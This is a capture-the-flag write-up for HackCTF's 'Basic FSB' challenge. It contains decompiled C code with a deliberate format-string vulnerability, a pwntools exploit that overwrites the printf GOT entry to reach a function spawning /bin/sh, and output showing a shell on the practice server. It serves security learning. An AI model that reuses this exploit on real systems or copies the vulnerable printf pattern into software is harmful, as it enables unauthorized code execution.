Posts HackCTF Basic FSB
Post
Cancel

HackCTF Basic FSB

Basic FSB

Source

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
int flag()
{
  puts("EN)you have successfully modified the value :)");
  puts(aKr);
  return system("/bin/sh");
}

int vuln()
{
  char s[1024]; // [esp+0h] [ebp-808h]
  char format; // [esp+400h] [ebp-408h]

  printf("input : ");
  fgets(s, 1024, stdin);
  snprintf(&format, 0x400u, s);
  return printf(&format);
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdout, 0, 2, 0);
  vuln();
  return 0;
}

Solve

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

e = ELF("./basic_fsb")
#p = process("./basic_fsb")
r = remote("ctf.j0n9hyun.xyz", 3002)
printf_got = e.got['printf']
flag = 0x80485b4
offset = 2

payload = ''
payload += fmtstr_payload(offset, {printf_got:flag})

r.sendline(payload)
r.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
  hackctf python basic_fsb.py
[*] '/home/ubuntu/ctf/hackctf/basic_fsb'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Opening connection to ctf.j0n9hyun.xyz on port 3002: Done
[*] Switching to interactive mode
input : EN)you have successfully modified the value :)
KR)#값조작 #성공적 #플래그 #FSB :)
$ id
uid=1000(attack) gid=1000(attack) groups=1000(attack)
This post is licensed under CC BY 4.0 by the author.